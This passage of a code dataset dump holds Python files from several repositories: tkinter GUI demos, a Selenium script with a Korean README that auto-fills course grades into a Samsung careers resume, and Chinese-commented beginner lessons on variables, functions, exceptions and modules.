choice2)\n\n choice3 = \"\"\n if self.mayo.get() == 1:\n choice3 += \" mayo,\"\n\n if self.ketchup.get() == 1:\n choice3 += \" ketchup,\"\n\n if self.mustard.get() == 1:\n choice3 += \" mustard,\"\n\n if choice3 == \"\":\n order = \"Ordering \" + choice1 + \" on \" + choice2\n else:\n order = \"Ordering \" + choice1 + \" on \" + choice2 + \" with\" + choice3[:-1]\n\n print(order)\n\n self.show_order.set(order)\n\n\nOrderUp()\n" }, { "alpha_fraction": 0.6088709831237793, "alphanum_fraction": 0.6199596524238586, "avg_line_length": 26.55555534362793, "blob_id": "9deb85623487c2d63a5e2609eca42666efd1240d", "content_id": "173f8db751f1cb1aefbd0e3dc301d484eb2d56cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 992, "license_type": "no_license", "max_line_length": 73, "num_lines": 36, "path": "/tkinter demo 4.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Respond to a button click by changing the text in a label\n\n# All code and variables are contained in functions\n# All functions are contained in a class\n\n\nclass ButtonAndLabel:\n # Constructor\n def __init__(self):\n\n window = Tk()\n # Set the window title and size\n window.title(\"Tkinter Demo 4\")\n window.geometry(\"300x100\")\n\n # Create a label and a button with a font and a color\n self.label = Label(window, text=\"This Is Getting Interesting\",\n font=(\"Arial\", 14), foreground=\"Blue\")\n\n self.button = Button(window, text=\"Click Me\", font=(\"Arial\", 14),\n foreground=\"Green\", command=self.process_click)\n\n self.label.pack()\n self.button.pack()\n\n window.mainloop()\n\n def process_click(self):\n # Change the label in response to the button click\n self.label.config(text=\"Thanks for clicking\")\n\n\n# Create a GUI object\nButtonAndLabel()\n" }, { "alpha_fraction": 0.5620155334472656, "alphanum_fraction": 0.5891472697257996, "avg_line_length": 30.463415145874023, "blob_id": "ee2354d56a5b639733176963c42a6d46bfe42707", "content_id": "d1325db2e345a572857261212a5dde9727c89aaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1290, "license_type": "no_license", "max_line_length": 76, "num_lines": 41, "path": "/tkinter demo 5.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Layout a simple form using the Grid Manager\n\n\nclass Form1:\n def __init__(self):\n\n window = Tk()\n window.title(\"Tkinter Demo 5\")\n window.geometry(\"400x200\")\n\n # Create the fields\n Label(window, text=\"Enter your name: \", font=(\"Arial\", 14),\n foreground=\"Blue\").grid(row=1, column=1, pady=10)\n\n # Declare a StringVar and textvariable\n # to read the user entry from an Entry field\n self.name = StringVar()\n Entry(window, font=(\"Arial\", 14), foreground=\"Blue\",\n textvariable=self.name).grid(row=1, column=2, pady=10)\n\n btn_greeting =\\\n Button(window, text=\"Announce Guest\", font=(\"Arial\", 14),\n foreground=\"Green\", command=self.process_click)\n btn_greeting.grid(row=2, column=1, columnspan=2, pady=10)\n\n self.lbl_message = Label(window, text=\"Welcome\", font=(\"Arial\", 14),\n foreground=\"Blue\")\n self.lbl_message.grid(row=3, column=1, columnspan=2, pady=10)\n\n window.mainloop()\n\n # Handle the button click\n def process_click(self):\n # Show a welcome message for the guest\n self.lbl_message.config(text=\"Welcome \" + self.name.get())\n\n\n# Create a GUI object\nForm1()\n" }, { "alpha_fraction": 0.6720647811889648, "alphanum_fraction": 0.6781376600265503, "avg_line_length": 18.760000228881836, "blob_id": "2372b77a11bead5040a4bce2f7ccd05fc6615d81", "content_id": "dd50dc0ea4bfc40b4d1d6e3bba6d5cae85698dfd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 494, "license_type": "no_license", "max_line_length": 67, "num_lines": 25, "path": "/tkinter demo 2.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom tkinter import messagebox\n\n# Provide a function to respond to a button click\n\n\ndef process_click():\n messagebox.showinfo(\"My Dialog Box\", \"You Clicked Me\")\n\n\ndef demo2():\n window = Tk()\n window.title(\"Tkinter Demo 2\")\n\n label = Label(window, text=\"This Is Getting Interesting\")\n\n # Set the action for a button click\n button = Button(window, text=\"Click Me\", command=process_click)\n\n label.pack()\n button.pack()\n\n window.mainloop()\n\ndemo2()\n" }, { "alpha_fraction": 0.6290322542190552, "alphanum_fraction": 0.6387096643447876, "avg_line_length": 16.22222137451172, "blob_id": "d0da4f5d2a3fe335341ed96ab246043280512a35", "content_id": "de017d6c3658ffbc96b3fe81cf46273f2780c8bc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 310, "license_type": "no_license", "max_line_length": 61, "num_lines": 18, "path": "/tkinter demo 1.py", "repo_name": "emailman/tkinter_demos", "src_encoding": "UTF-8", "text": "from tkinter import *\n\n# Show a button and a label, but no action\n\n\ndef demo1():\n window = Tk()\n window.title(\"Tkinter Demo 1\")\n\n label = Label(window, text=\"This Is Getting Interesting\")\n button = Button(window, text=\"Click Me\")\n\n label.pack()\n button.pack()\n\n window.mainloop()\n\ndemo1()\n" } ]
8
cupyty/samsungGradeinput
https://github.com/cupyty/samsungGradeinput
afb9c7a82ecfe12ade4e1b5edc084b5bb94886d7
75b4d3b4efa383adf326f0741eedc9d6eaec93ef
c0a774b109c5bd426bbd57018419cf39796ab7b8
refs/heads/master
2020-07-23T22:35:44.422384
2019-09-09T05:04:20
2019-09-09T05:04:20
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6316981315612793, "alphanum_fraction": 0.648301899433136, "avg_line_length": 35.80555725097656, "blob_id": "b9006fba5835213b18f597a1cb7a1ff13e8d6f28", "content_id": "0509bd66f2bcc85db60e6beceb917748beda5be8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2527, "license_type": "no_license", "max_line_length": 89, "num_lines": 36, "path": "/README.md", "repo_name": "cupyty/samsungGradeinput", "src_encoding": "UTF-8", "text": "# samsungGradeinput\n삼성 채용 이력서 작성에 필요한 이수학점 입력을 크롤링으로 해결합니다.\n\n__주의사항__ *경북대yes에서 제공하는 전체성적파일 양식을 따릅니다. *파이썬 에디터가 필요합니다.\n\n### 초기 설정\n1. 전체 파일을 다운로드합니다.\n2. 본인의 크롬의 버전에 맞는 chromdriver를 원하는 위치에 설치합니다. https://chromedriver.chromium.org/downloads\n3. 경북대 yes에 접속하여 성적 카테고리에 들어가 전체 이수성적 엑셀파일을 다운로드합니다.\n * xls 파일 형식일 경우 xlsx로 업그레이드시켜줍니다. (xls는 프로그램에서 다룰 수 없습니다.)\n4. 전체성적 엑셀파일을 편의를 위해서 파이썬 파일(gradecraw.py)과 같은 위치에 둡니다.\n5. 파이썬 파일을 편집 모드로 열어주시고, ####주석을 찾습니다.\n\n #따옴표안에 아이디(이메일)와 비밀번호를 적습니다.\n s_id, s_pa = '' \n \n #따옴표안에 전체성적.xlsx파일의 경로를 적습니다. 파이썬 파일과 같은 위치일경우 pass\n load_wb = load_workbook(\"전체성적.xlsx\", data_only=True)\n \n #따옴표안에 chromedriver의 경로를 적습니다. 밑과 같은 위치라면 pass\n driver = webdriver.Chrome('C:\\\\chromedriver')\n \n # 63번 줄에 있는 코드에서 엑셀에 끝항목을 적어주세요 예로 F50에 끝난다면 F3 자리에 F50으로 고쳐주세요\n # 여유공간을 두어도 무방합니다. \n multiple_cells = load_ws['A2':'F3']\n\n### 설정이 끝나면\n* 파이썬 에디터에서 파이썬 파일을 실행시켜주세요. 크롬 창이 뜨고 크롤링이 시작됩니다.\n* 콘솔 창에 나오는 에러는 확인을 위해 나오는 것입니다. 계속 진행하시면 됩니다.\n * 같은 에러가 계속해서 나오고, 크롤링이 멈춘 것같다면 해당되는 하얀색 칸을(사진 참고) 한번만 클릭해주세요\n <img src=\"IMG_9209.jpg\" width=\"200px\"></img>\n * 다른 에러가 뜬다면 프로그램을 종료시키고, 다시 실행해주세요.\n* 파이썬이 실행시킨 크롬창을 최소화하면 안됩니다. 진행이 안됩니다. \n* 이 프로그램은 1회수강을 고정해두고있습니다. 재이수 과목이 있을 경우 (프로그램이 끝나고) 직접 수정해야합니다.\n\n### *프로그램이 끝난다면, 창을 끄기 전에 삼성 이력서 저장을 해주세요!*\n" }, { "alpha_fraction": 0.47488516569137573, "alphanum_fraction": 0.48747962713241577, "avg_line_length": 30.390697479248047, "blob_id": "3dd42b21f7cf24c950acc67657b678fb08e4c8d4", "content_id": "9384a70c411794f270cea07e49b65eafdc611eb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7621, "license_type": "no_license", "max_line_length": 100, "num_lines": 215, "path": "/gradecraw.py", "repo_name": "cupyty/samsungGradeinput", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\nfrom openpyxl import load_workbook\n\n#### 삼성 아이디(이메일)와 비밀번호를 적어주세요\ns_id = '여기에 이메일을 적어주세요 삼성아이디(이메일)'\ns_pa = '여기에 비밀번호를 적어주세요'\n\n# data_only=Ture로 해줘야 수식이 아닌 값으로 받아온다.\n#### 전체성적 엑셀파일을 이 파이썬 파일과 같은 위치에 놔둬야합니다.\n#### 아니면 \"전체성적엑셀파일이 있는 경로\"를 적어주세요\n#### yes.knu.ac.kr 에 있는 성적 전체엑셀파일 형식만 가능합니다.\n#### xls로 되어있다면 xlsx로 업그레이드 해주셔야합니다.\nload_wb = load_workbook(\"전체성적.xlsx\", data_only=True)\n# 시트 이름으로 불러오기\nload_ws = load_wb['Sheet']\n\n# Chrome(' 이 위치에 chromedriver파일 위치를 넣어준다. 밑은 예시로 c드라이브안에 바로 넣었을때') driver connect\ndriver = webdriver.Chrome('C:\\\\chromedriver')\n\ncnt = 0\n\ndef gr_craw(sam_id, sam_pass):\n driver.get('https://www.samsungcareers.com/rec/apply/ComResumeServlet')\n time.sleep(3)\n tmp = driver.find_element_by_name('email')\n tmp.send_keys(sam_id)\n tmp = driver.find_element_by_name('password')\n tmp.send_keys(sam_pass)\n tmp.send_keys(Keys.RETURN) ## 로긴 버튼 클릭\n time.sleep(2)\n alert = driver.switch_to.alert\n alert.accept()\n time.sleep(3)\n\n driver.find_element_by_xpath(\n '//*[@id=\"cont\"]/div[1]/ul/div/dl/dd[1]/p/span/a'\n ).click() ## 3급신입채용 클릭\n time.sleep(4)\n\n try:\n tmp = driver.find_element_by_xpath('//*[@id=\"masTable1\"]/tr/td[3]/a')\n except:\n time.sleep(2)\n tmp = driver.find_element_by_xpath('//*[@id=\"masTable1\"]/tr/td[3]/a')\n\n tmp.click() ## 작성중 이력서 항목중 1번째 클릭\n time.sleep(4)\n alert = driver.switch_to.alert\n alert.accept()\n time.sleep(2)\n\n tmp= driver.find_element_by_xpath(\n '//*[@id=\"cont\"]/table[1]/tbody/tr/td/table/tbody/tr/td/table/tbody/tr/td/div[2]/ul/li[3]/a'\n )\n tmp.click() ## 이수교과목 클릭\n time.sleep(2)\n alert = driver.switch_to.alert\n alert.accept()\n time.sleep(2)\n\n multiple_cells = load_ws['A2':'F60']\n while 1:\n try:\n time.sleep(2)\n driver.find_element_by_name('tmp_schlcarrcdView').click() ## 학사버튼클릭하기\n time.sleep(2)\n driver.find_element_by_xpath(\n '//*[@id=\"applyform_tmp_schlcarrcd_5\"]'\n ).click() ## 버튼클릭하기\n break\n except:\n print('과정선택 에러')\n time.sleep(2)\n continue\n while 1:\n try:\n print(2)\n driver.find_element_by_name(\n 'tmp_majcdView'\n ).click() ## 전공명버튼클릭하기\n time.sleep(1)\n driver.find_element_by_xpath(\n '//*[@id=\"applyform_tmp_majcd_22WD\"]'\n ).click() ## 버튼클릭하기\n break\n except:\n print('전공명선택 에러')\n time.sleep(5)\n continue\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_retakeynView'\n ).click() ## 버튼클릭하기\n time.sleep(2)\n driver.find_element_by_id('applyform_tmp_retakeyn_N').click() ## 버튼클릭하기\n break\n except:\n print('재수강여부 에러')\n time.sleep(1)\n continue\n\n for row in multiple_cells:\n list_r = []\n for cell in row:\n list_r.append(cell.value) # 한 row 정보를 임시 list에 저장\n\n if list_r[0] == None:\n break\n if list_r[1] == '':\n continue\n\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_regyrView'\n ).click() ## 수강년도버튼클릭하기\n time.sleep(1)\n st_yr = 'applyform_tmp_regyr_'+ list_r[0][0:4]\n driver.find_element_by_id(st_yr).click()\n break\n except:\n print('수강년도선택 에러')\n time.sleep(1)\n continue\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_semstView'\n ).click() ## 버튼클릭하기\n time.sleep(1)\n st_semst = ''\n if list_r[0][4]=='S':\n st_semst = 'applyform_tmp_semst_여름계절'\n elif list_r[0][4] == 'W':\n st_semst = 'applyform_tmp_semst_겨울계절'\n else:\n st_semst = 'applyform_tmp_semst_'+list_r[0][4]\n driver.find_element_by_id(st_semst).click() ## 학기버튼클릭하기\n break\n except:\n print('학기선택 에러')\n time.sleep(1)\n continue\n print(list_r)\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_majtypecdView'\n ).click() ## 과목유형버튼클릭하기\n st_matype=''\n time.sleep(1)\n if '공학전공' in list_r[1]:\n driver.find_element_by_id('applyform_tmp_majtypecd_A').click() ## 전공 클릭\n else:\n driver.find_element_by_id('applyform_tmp_majtypecd_C').click() ## 교양 클릭\n break\n except:\n print('과목유형선택 에러')\n time.sleep(1)\n continue\n st_name = driver.find_element_by_name('tmp_majcurrinm')\n st_name.send_keys(list_r[3])\n while 1:\n try:\n driver.find_element_by_name(\n 'tmp_obtptView'\n ).click() ## 버튼클릭하기\n time.sleep(2)\n st_obtpt = 'applyform_tmp_obtpt_'+list_r[4]\n driver.find_element_by_id(st_obtpt).click() ## 버튼클릭하기\n break\n except:\n print('학점선택 에러')\n time.sleep(1)\n continue\n print(list_r[0],\"중간확인\")\n while 1:\n try:\n print('성적확인1')\n driver.find_element_by_name(\n 'tmp_obtpovView'\n ).click() ## 버튼클릭하기\n print('성적확인2')\n if '0' in list_r[5]:\n list_r[5]=list_r[5][0:-1]\n elif 'S' in list_r[5]:\n list_r[5] = 'PASS'\n # st_obtpov = 'applyform_tmp_obtpov_'+list_r[5]\n st_obtpov = list_r[5]\n print('성적확인3',st_obtpov)\n time.sleep(3)\n driver.find_element_by_link_text(st_obtpov).click() ## 버튼클릭하기\n break\n except:\n print('성적선택 에러')\n time.sleep(1)\n continue\n time.sleep(2)\n driver.find_element_by_xpath('//*[@id=\"budiv_mySheet_AddMajdet\"]/a').click() #추가버튼 클릭\n\n\ngr_craw(s_id, s_pa)\ntime.sleep(2)\ndriver.find_element_by_name('abeektgtynView').click()\ntime.sleep(2)\ndriver.find_element_by_id('applyform_abeektgtyn_B').click()\ntime.sleep(2)\ndriver.find_element_by_xpath('//*[@id=\"budiv_mySheet_Save\"]/a')\n\n# f.close()\n# driver.close()\n# driver.quit()\n" } ]
2
Three-Y/MyPythonLearning
https://github.com/Three-Y/MyPythonLearning
1e32a465896fad2caf24fddf6c00d4e63e98d0eb
84c66632502b846f580cbd19781f7ec487e8b8ab
54862efb410ab30283cab76be3a1b2947296d4c0
refs/heads/master
2023-01-22T08:52:21.073278
2020-12-05T10:08:51
2020-12-05T10:08:51
316,262,068
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5560625791549683, "alphanum_fraction": 0.5782268643379211, "avg_line_length": 15.67391300201416, "blob_id": "badfb30ca0a6df2b60b69721786a6a75f8ea2da8", "content_id": "87b1cbc4caee946ccd13c69a88a77395fc3d6636", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2202, "license_type": "no_license", "max_line_length": 70, "num_lines": 92, "path": "/ibbie_40_异常.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n异常\n try:\n 不确定能否正确执行的代码\n except (异常1, 异常2):\n 若出现错误需要执行的代码\n except Exception as 变量名:\n 对未知错误的处理\n else:\n 没有异常才会执行的代码\n finally:\n 无论是否发生异常都会执行的代码\n\n 预判程序可能出现的异常,进行适当的处理,提高程序的健壮性\n 可以获取捕获的异常==>except Exception as 变量名:\n\n异常的传递\n 发生异常后,如果不进行处理,会抛给调用方,调用方不处理,会继续抛给调用方的调用方,以此类推,如果异常抛到主程序都没有被处理,程序终止\n\n主动抛出异常\n e = Exception(\"这里可以添加异常信息\") 创建异常对象\n raise e 抛出异常\n\"\"\"\n\"\"\"处理异常\"\"\"\ntry:\n num = int(input(\"请输入整数:\"))\nexcept:\n print(\"你的输入有误!\")\n\nprint(\"*\" * 20)\n\n\"\"\"根据异常类型进行不同的处理\"\"\"\ntry:\n x = int(input(\"请输入除数:\"))\n result = 666 / x\n print(\"666/%d\" % x)\nexcept ValueError:\n print(\"你的输入有误!\")\nexcept ZeroDivisionError:\n print(\"除数不能为0!\")\n\n\"\"\"获取异常\"\"\"\ntry:\n x = int(input(\"请输入除数:\"))\n result = 666 / x\n print(\"666/%d\" % x)\nexcept ValueError:\n print(\"你的输入有误!\")\nexcept Exception as result:\n print(result)\n\n\"\"\"else和finally\"\"\"\ntry:\n x = int(input(\"请输入除数:\"))\n result = 666 / x\n print(\"666/%d=%d\" % (x, result))\nexcept ValueError:\n print(\"你的输入有误!\")\nexcept Exception as result:\n print(result)\nelse:\n print(\"没有异常发生\")\nfinally:\n print(\"无论是否有异常都会执行\")\n\n\"\"\"异常的传递\"\"\"\ndef demo1():\n return int(input(\"请输入除数:\"))\n\ndef demo2():\n b = demo1()\n print(\"666/%d=%d\" % (b, 666 / b))\n\ntry:\n demo2()\nexcept Exception as e:\n print(\"未知异常:%s\" % e)\n\n\ndef input_psw():\n str = input(\"请输入密码:\")\n if len(str) > 8:\n print(\"输入成功\")\n else:\n e = Exception(\"密码长度不够!\")\n raise e\n\n\ntry:\n input_psw()\nexcept Exception as exc:\n print(exc)\n" }, { "alpha_fraction": 0.640625, "alphanum_fraction": 0.6640625, "avg_line_length": 18.69230842590332, "blob_id": "ab638d53a4678738d961176860157cbed6c1864e", "content_id": "fc79d36b93cc8148c03e04f0d84aecf1a6671ed3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 380, "license_type": "no_license", "max_line_length": 90, "num_lines": 13, "path": "/ibbie_05_接收输入与类型转换.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# input()函数\ninput()\n\n# 显示输入信息,并将接收的数据赋给变量\n# input()的返回值是字符串\nprice = input(\"请输入单价:\")\ncount = input(\"请输入个数:\")\n# print(\"总价是:\"+price*count) # TypeError: can't multiply sequence by non-int of type 'str'\n# 需要进行类型转换才能进行计算\n\n# 类型转换\na = int(\"123\")\nb = float(\"123\")\n" }, { "alpha_fraction": 0.4571428596973419, "alphanum_fraction": 0.5714285969734192, "avg_line_length": 17, "blob_id": "7c96631ad0aa2bceb4413cf0fb681714f3d4e032", "content_id": "b279dce2f2fff5b56e9fcb7601af9d18c2bbbb36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 35, "license_type": "no_license", "max_line_length": 21, "num_lines": 2, "path": "/ibbie_43_package/test_package.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "def test43():\n print(\"test43()\")" }, { "alpha_fraction": 0.5342163443565369, "alphanum_fraction": 0.6048564910888672, "avg_line_length": 17.91666603088379, "blob_id": "7f9624dd0ba9cce55fa16d249aee040c0cc9a6e3", "content_id": "538d528ecd67b636dfde97b5ce24a392744e219e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 705, "license_type": "no_license", "max_line_length": 66, "num_lines": 24, "path": "/ibbie_06_变量的格式化输出.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n格式化字符\n %s 字符串\n %d 有符号的十进制整数,%06d表示显示6位数,不足补0\n %f 浮点数,%.2f表示保留两位小数\n %% 输出%\n %x 以十六进制的方式输出\n\nprint(\"格式化字符串\" % 变量1)\nprint(\"格式化字符串\" % (变量1,变量2,变量3...))\n\"\"\"\nname = \"ibbie\"\nprint(\"我叫%s\" % name) # 我叫ibbie\n\nstu_no = 123\nprint(\"我的学号是%06d\" % stu_no)\n\nprice = 2.5\nweight = 5\nmoney = price * weight\nprint(\"苹果的单价是%.2f/斤,一共%.2f斤,需要支付%.2f元\" % (price, weight, money))\n\nscale = 0.9999\nprint(\"你暴富的概率是%.2f%%\" % (scale * 100)) # 注意,若计算部分不加括号,会将字符串输出100遍" }, { "alpha_fraction": 0.6764705777168274, "alphanum_fraction": 0.6764705777168274, "avg_line_length": 16, "blob_id": "e27aae7a3f8bd1cf9691950fd958838deb871d41", "content_id": "e3a0a14916a154c4ec6bef51ada789294b3e0e2b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 38, "license_type": "no_license", "max_line_length": 21, "num_lines": 2, "path": "/HelloPython.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "print(\"Hello Python\")\nprint(\"中文\")\n" }, { "alpha_fraction": 0.6450216174125671, "alphanum_fraction": 0.709956705570221, "avg_line_length": 18.33333396911621, "blob_id": "009f365e3144a91a2c923e39c5db8f6feb3676d7", "content_id": "45d7cdff749214384ee669de951ef6a809f6499f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 275, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/ibbie_44_导入包.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n导入包\n\"\"\"\n\nimport ibbie_43_package\n\nibbie_43_package.test_package.test43()\n\"\"\"\n因为ibbie_43_package的__init__.py中没有声明这个模块,所以无法调用\nCannot find reference 'test_package2' in '__init__.py' \n\"\"\"\n# ibbie_43_package.test_package2.test43_2()" }, { "alpha_fraction": 0.7077922224998474, "alphanum_fraction": 0.7337662577629089, "avg_line_length": 16.11111068725586, "blob_id": "c1e406ee52290f610544633f1d40ed4b027b9268", "content_id": "67fa075bb54260fa9ace530c52ae223511af482e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "no_license", "max_line_length": 66, "num_lines": 18, "path": "/ibbie_15_模块.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n模块的概念\n 模块就是一个工具包,导入对应的模块就能使用模块中的工具\n 每个py文件就是一个模块\n\n导入模块:import 模块名\n 注意:数字开头的模块名无法使用import关键字导入\n 如果解释器发现import关键字,会将对应的模块解释后的字节码文件放到__pycache__文件夹中,提升程序的速度\n\"\"\"\n\n# 导入模块\nimport ibbie_14_函数\nimport ibbie_03_变量\n\n# 调用其它模块的函数\nibbie_14_函数.print_star_heart()\n# 调用其它模块的变量\nprint(ibbie_03_变量.name)\n" }, { "alpha_fraction": 0.478658527135849, "alphanum_fraction": 0.5213414430618286, "avg_line_length": 17.22222137451172, "blob_id": "e512a8d74c761fed88114a89d6d26a05c0a0672e", "content_id": "2317825b778c0d95d677d5f0ddd8404a6d868674", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 396, "license_type": "no_license", "max_line_length": 42, "num_lines": 18, "path": "/ibbie_09_石头剪刀布.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "import random\n\n# 玩家\nplayer = int(input(\"请选择 石头(1)剪刀(2)布(3):\"))\n\n# 系统\nsys = random.randint(1, 3)\nprint(\"系统出的是 石头(1)剪刀(2)布(3):%d\" % sys)\n\n# 比较\nif (player == 1 and sys == 2) \\\n or (player == 2 and sys == 3) \\\n or (player == 3 and sys == 1):\n print(\"你赢了\")\nelif player == sys:\n print(\"平局\")\nelse:\n print(\"你输了\")\n" }, { "alpha_fraction": 0.5182978510856628, "alphanum_fraction": 0.559148907661438, "avg_line_length": 14.259739875793457, "blob_id": "f4a357ff4e5046f4dd47df2bb189c723cf9bdb1d", "content_id": "e0708af824a1f232db5faeeddf81f0f45614936f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1737, "license_type": "no_license", "max_line_length": 61, "num_lines": 77, "path": "/ibbie_14_函数.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n函数:具有独立功能的代码块,需要时调用\n\n格式:\n def 函数名(参数列表):\n 函数体\n return 返回值\n\"\"\"\n\n# 定义函数 函数定义的上方建议保留两行空行\ndef print_star_heart():\n \"\"\"\n 此处是print_stat_heart的文档注释\n 在调用处使用快捷键ctrl+Q可以查看函数的文档注释\n \"\"\"\n j = 10\n while j >= 1:\n k = j\n while k >= 1:\n print(\"⭐\", end=\"♥\") # end=\"\"表示结尾不加任何东西,也可以指定其它符号\n k = k - 1\n print(\"\")\n j = j - 1\n\n\n# 调用函数\n# 调用必须在定义函数之后\nprint_star_heart()\n\n\n# 定义带参的函数\ndef sum_of(num1, num2):\n print(\"%d + %d = %d\" % (num1, num2, num1 + num2))\n\n\n# 调用带参的函数\nsum_of(10, 100)\n\n\n# 有返回值的函数\ndef sum_of_2(num1, num2):\n return num1 + num2\n\n\n# 调用有返回值的函数,接收函数的返回值\nresult = sum_of_2(100, 500)\n\n\n# 函数的嵌套调用\ndef test():\n print(\"**********我是test()的开始**********\")\n print_star_heart()\n sum_of(1,1)\n print(\"**********我是test()的结尾**********\")\n\n\ntest()\n\n\n# 多个返回值的函数\ndef test2():\n print(\"我是test2()\")\n # 可以使用元组返回多个数据\n return 1, \"haha\", {\"key1\": 666} # 如果返回的类型是元组,可以省略括号\n\n\ntest2_tuple = test2()\nprint(test2_tuple)\nprint(test2_tuple[0])\nprint(test2_tuple[1]) # 使用下标取值不方便\n\n# 如果需要接收多个返回值,同时需要单独处理每个返回值,可以使用多个变量接收返回值\n# 注意:变量的个数必须与返回值的个数一致\nnum, str2, dic = test2()\nprint(num)\nprint(str2)\nprint(dic)\n" }, { "alpha_fraction": 0.6352201104164124, "alphanum_fraction": 0.6540880799293518, "avg_line_length": 19, "blob_id": "5af344ec5dbc5cfaafd501a3576eec85a5bd658a", "content_id": "9e492c7fc9a9821204234d0e0cef8f34e2c47818", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 36, "num_lines": 8, "path": "/ibbie_46_pip安装第三方模块.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\npip安装\n pip是一个包管理工具\n 如果想要安装到python2.X的环境\n 安装:sudo pip install pygame\n 卸载:sudo pip uninstall pygame\n 如果想要安装到pyhong3.X的环境,改成==>pip3\n\"\"\"" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 8, "blob_id": "a20d214ca333d6993550774efce1739c7e270405", "content_id": "5e95cc8c47ce181b47893388866afdf6101d5f04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 17, "num_lines": 5, "path": "/ibbie_38_属性查找机制.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\n属性查找的顺序\n 向上查找机制\n 对象内部==>类属性==>\n\"\"\"" }, { "alpha_fraction": 0.582524299621582, "alphanum_fraction": 0.6019417643547058, "avg_line_length": 13.714285850524902, "blob_id": "b51390a4d3e789d1a2000567e3c292265e69a8aa", "content_id": "1420a46b639a87195b2c126888333e0bd3f1af28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 181, "license_type": "no_license", "max_line_length": 37, "num_lines": 7, "path": "/ibbie_04_字符串.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "# 使用\"+\"拼接字符串\na = \"ibbie\"\nb = \"yan\"\nprint(a+\".\"+b)\n\n# 使用\"*\"重复相同的字符串,除此以外,数值型和字符串不能进行其它的运算\nprint(a * 10)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 13.25, "blob_id": "5d8dc9c2276c341452597050445b5ecf554ebfc1", "content_id": "00acc801fc3b8b31836939716d0bb75be70d6975", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 293, "license_type": "no_license", "max_line_length": 61, "num_lines": 12, "path": "/ibbie_34_MRO方法搜索顺序.py", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "\"\"\"\nMRO方法搜索顺序\n 类名.__mro__ 可以调用python提供的内置属性mro查看方法的调用顺序\n python查找方法的顺序是:本类==>父类(按声明顺序从左到右)==>Object类(python所有类的基类)\n\"\"\"\n\n\nclass Test:\n pass\n\n\nprint(Test.__mro__)\n" }, { "alpha_fraction": 0.4752066135406494, "alphanum_fraction": 0.8057851195335388, "avg_line_length": 59.75, "blob_id": "963c14d7605346daa0407de0569b2c7ce5ff07c5", "content_id": "1f2e260ecc88b5bf506659c1e577da1d3c2d2026", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 242, "license_type": "no_license", "max_line_length": 176, "num_lines": 4, "path": "/readme.txt", "repo_name": "Three-Y/MyPythonLearning", "src_encoding": "UTF-8", "text": "***********Hello Python***********\nauthor:ibbie.yan\nemail:[email protected]\nphone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086phone:10086" }, { "alpha_fraction": 0.5759999752044678, "alphanum_fraction": 0.6179999709129333, "avg_line_length": 12.184210777282715, "blob_id": 